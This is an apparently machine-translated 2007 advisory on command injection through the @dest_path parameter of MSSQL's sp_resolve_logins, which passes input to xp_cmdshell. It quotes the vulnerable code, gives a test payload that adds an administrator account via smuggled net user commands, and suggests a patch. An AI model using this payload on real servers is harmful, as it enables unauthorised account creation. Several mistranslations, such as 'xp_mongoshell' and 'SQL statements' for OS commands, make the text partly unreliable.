An injection vulnerability in MSSQL Stored Procedures

Infos: an injection of MSSQL's own Stored Procedure
Author: Crazy [BCT]
Date: 10/11/2007

I can see that MSSQL is stored in a pattern for filtering. Then I read their stored procedures. An injection is found.
Said the madman.
The vulnerability information is as follows:

In the stored process of master .. sp_resolve_logins, the @ dest_path parameter is not strictly filtered, resulting in xp_mongoshell injection.

Analysis:CopyCodeThe Code is as follows: Select @ dest_path = rtrim (ltrim (@ dest_path ))

-- If the last char is '\', remove it.
If substring (@ dest_path, Len (@ dest_path), 1) = '\'
Select @ dest_path = substring (@ dest_path, 1, Len (@ dest_path)-1)

-- Don't do validation if it is a UNC path due to security problem.
-- If the server is started as a service using local SYSTEM account, we
-- Don't have access to the UNC path.
If substring (@ dest_path, 1, 2) <> '\\'
Begin
Select @ command = 'dir "'+ @ dest_path + '"'
Exec @ retcode = Master .. xp_cmdshell @ command, 'no _ output'
If @ error <> 0
Return (1)
If @ retcode <> 0
Begin
Raiserror (14430, 16,-1, @ dest_path)
Return (1)
End
End

The master .. sp_resolve_logins stored procedure is in this section. After some judgment, @ dest_path is filtered.
But no filtering "(double quotation marks) causes xp_cmdshell to execute arbitrary SQL statements.

Test code:
Exec sp_resolve_logins 'text', 'e: \ ASP \ "& net user admina admin/Add & net localgroup administrators admina/Add & dir" E: \ ASP ', '1. ASP'
After executing the preceding MSSQL statement, a system account named admina is successfully added.

However, the Stored Procedure Code determines the account that requires the system systemadmin permission.

A Madman provides a method to patch it: copy Code the code is as follows: Use the fn_escapecmdshellsymbolsremovequotes function to filter @ dest_path. For example,
select @ dest_path = rtrim (ltrim (fn_escapecmdshellsymbolsremovequotes (@ dest_path), so that no injection is generated.